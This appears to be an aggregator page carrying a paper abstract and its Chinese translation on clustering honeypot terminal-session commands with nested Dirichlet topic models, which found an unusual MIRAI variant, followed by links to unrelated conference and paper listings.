Nested Dirichlet models for unsupervised attack pattern detection in honeypot data

Cyber-systems are under near-constant threat from intrusion attempts. Attacks types vary, but each attempt typically has a specific underlying intent, and the perpetrators are typically groups of individuals with similar objectives. Clustering attacks appearing to share a common intent is very valuable to threat-hunting experts. This article explores Dirichlet distribution topic models for clustering terminal session commands collected from honeypots, which are special network hosts designed to entice malicious attackers. The main practical implications of clustering the sessions are two-fold: finding similar groups of attacks, and identifying outliers. A range of statistical models are considered, adapted to the structures of command-line syntax. In particular, concepts of primary and secondary topics, and then session-level and command-level topics, are introduced into the models to improve interpretability. The proposed methods are further extended in a Bayesian nonparametric fashion to allow unboundedness in the vocabulary size and the number of latent intents. The methods are shown to discover an unusual MIRAI variant which attempts to take over existing cryptocurrency coin-mining infrastructure, not detected by traditional topic-modelling approaches.

翻译：网络系统几乎持续面临入侵尝试的威胁。攻击类型各异，但每次尝试通常具有特定的潜在意图，且攻击者通常为具有相似目标的个体群体。对看似具有共同意图的攻击进行聚类对于威胁狩猎专家而言极具价值。本文探讨了利用狄利克雷分布主题模型对从蜜罐（专为诱捕恶意攻击者而设计的特殊网络主机）收集的终端会话命令进行聚类的方法。对会话进行聚类的主要实际意义体现在两方面：发现相似的攻击群体以及识别异常值。研究考虑了一系列适应命令行语法结构的统计模型。特别地，模型中引入了主次主题概念，以及会话级与命令级主题概念，以提升模型的可解释性。所提出的方法进一步以贝叶斯非参数方式进行了扩展，允许词汇量和潜在意图数量无界增长。实验表明，该方法能够发现一种异常MIRAI变种，该变种试图劫持现有的加密货币挖矿基础设施，而传统主题建模方法未能检测到此类攻击。

相关内容

MoDELS

关注 45

ACM/IEEE第23届模型驱动工程语言和系统国际会议，是模型驱动软件和系统工程的首要会议系列，由ACM-SIGSOFT和IEEE-TCSE支持组织。自1998年以来，模型涵盖了建模的各个方面，从语言和方法到工具和应用程序。模特的参加者来自不同的背景，包括研究人员、学者、工程师和工业专业人士。MODELS 2019是一个论坛，参与者可以围绕建模和模型驱动的软件和系统交流前沿研究成果和创新实践经验。今年的版本将为建模社区提供进一步推进建模基础的机会，并在网络物理系统、嵌入式系统、社会技术系统、云计算、大数据、机器学习、安全、开源等新兴领域提出建模的创新应用以及可持续性。官网链接：http://www.modelsconference.org/

【CVPR 2022】一个完全无监督的框架，从噪声和部分测量中学习图像，Robust Equivariant Imaging: a fully unsupervised framework for learning to image

专知会员服务

25+阅读 · 2022年3月3日

【NeurIPS2021】用于文本图表示学习的 GNN 嵌套 Transformer 模型：GraphFormers

专知会员服务

46+阅读 · 2021年11月24日

【ACL2020】多模态信息抽取，365页ppt

专知会员服务

151+阅读 · 2020年7月6日

FlowQA: Grasping Flow in History for Conversational Machine Comprehension

专知会员服务

35+阅读 · 2019年10月18日